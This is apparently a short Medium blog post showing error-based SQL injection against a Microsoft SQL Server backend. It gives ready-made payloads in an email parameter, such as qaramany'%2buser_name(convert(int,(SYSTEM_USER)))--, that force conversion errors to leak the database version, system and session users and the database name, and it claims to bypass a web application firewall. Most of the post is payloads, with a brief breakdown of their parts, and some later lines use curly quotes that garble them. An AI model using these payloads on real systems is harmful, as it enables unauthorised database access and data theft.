Error based SQL Injection with WAF bypass manual Exploit 100%

Hands On

Picking Function

email=qaramany'
  • SUSER_NAME()
  • USER_NAME()
  • PERMISSIONS()
  • DB_NAME()
  • FILE_NAME()
  • TYPE_NAME()
  • COL_NAME()
qaramany'%2buser_name(@@version)--so this payload just got me the version of the database
  • qaramany : my name hahahahaha
  • ‘ : single quote that trigger the error
  • %2b : is the code for +
  • user_name() : function calls that trigger a data type conversion error on sought-after data
qaramany'%2buser_name(convert(int,(SYSTEM_USER)))--
qaramany’%2buser_name(convert(int,(SESSION_USER))) — 
qaramany’%2buser_name(UPPER(‘sql+tutorial+is+fun!’)) —
qaramany’%2buser_name(IIF(5=4,+’YES’,+’HackedBy_c0nqr0r&0x4m’)) —
qaramany’%2buser_name(convert(int,(db_name()))) —

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store